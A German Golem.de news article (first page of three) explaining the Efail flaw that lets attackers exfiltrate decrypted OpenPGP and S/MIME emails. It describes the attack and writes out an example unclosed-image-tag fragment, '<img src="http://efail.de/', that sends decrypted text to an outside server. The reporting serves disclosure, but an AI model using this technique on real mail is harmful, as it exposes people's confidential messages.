PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. SAP ABAP Entwickler (m/w/d)
    ZOLLERN GmbH & Co. KG, Sigmaringendorf-Laucherthal
  2. Informationssicherheitsbeauf- tragte:r (m/w/d)
    Kommunales Rechenzentrum Minden-Ravensberg/Lippe, Lemgo
Detailsuche

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed
Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...



Aktuell auf der Startseite von Golem.de
Wissenschaft
LHC hat drei neue exotische Teilchen entdeckt

Der sogenannte Teilchenzoo der Physik ist noch größer geworden. Die Wissenschaft hofft auf Bestätigung der Modelle zu deren internen Aufbau.

Wissenschaft: LHC hat drei neue exotische Teilchen entdeckt
Artikel
  1. VW.OS: VW-Software soll einfach updatefähig und bezahlbar sein
    VW.OS
    VW-Software soll "einfach updatefähig" und bezahlbar sein

    Mit seiner Softwaresparte Cariad will VW ein einheitliches System mit vereinfachter Architektur erstellen.

  2. Security: BSI beginnt Zertifizierung für 5G-Komponenten
    Security
    BSI beginnt Zertifizierung für 5G-Komponenten

    Eine schnelle und zuverlässige IT-Sicherheitsaussage für die geprüften Produkte, das verspricht das BSI. Doch welche Produkte sind betroffen?

  3. Superior Continuous Torque: E-Motor von Mahle für Dauerbetrieb unter Stress
    Superior Continuous Torque
    E-Motor von Mahle für Dauerbetrieb unter Stress

    Mahle hat einen neuen Auto-Elektromotor entwickelt, der unbegrenzt lange unter hoher Last betrieben werden kann. Dies wird durch ein neues Kühlkonzept im Motor erreicht.

Du willst dich mit Golem.de beruflich verändern oder weiterbilden?
Zum Stellenmarkt
Zur Akademie
Zum Coaching
  • Schnäppchen, Rabatte und Top-Angebote
    Die besten Deals des Tages
    Daily Deals • PS5 bestellbar • HP HyperX Gaming-Headset -40% • Corsair Wakü 234,90€ • Samsung Galaxy S20 128GB -36% • Audible -70% • MSI RTX 3080 12GB günstig wie nie: 948€ • AMD Ryzen 7 günstig wie nie: 259€ • Der beste 2.000€-Gaming-PC • CM 34" UWQHD 144 Hz günstig wie nie: 467,85€ [Werbung]
    •  /